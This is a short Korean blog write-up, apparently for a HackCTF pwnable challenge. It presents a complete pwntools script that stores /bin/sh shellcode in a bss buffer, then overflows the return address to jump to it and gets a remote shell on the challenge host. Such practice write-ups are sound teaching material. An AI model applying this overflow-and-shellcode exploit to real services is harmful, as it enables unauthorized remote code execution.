아무런 보호기법이 안걸려 있다
main에 name 이 없는데 사용하는 걸 보니
bss 주소에 있나 보다
name에 쉘코드를 저장하고 gets에서 name으로 이동하면 된다
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3003)
e = ELF('./prob1')
context.arch = 'i386'
name = 0x804A060
shellcode = asm(shellcraft.i386.sh())
r.sendline(shellcode)
payload = 'A'*24
payload += p32(name)
r.sendline(payload)
r.interactive()
'HackCTF > pwnable' 카테고리의 다른 글
HackCTF - x64 Simple_size_BOF (0) | 2021.11.21 |
---|---|
HackCTF - x64 Buffer Overflow (0) | 2021.11.21 |
HackCTF - Basic_FSB (0) | 2021.11.20 |
HackCTF - Basic_BOF #2 (0) | 2021.11.20 |
Hackctf - Basic_BOF #1 (0) | 2021.11.20 |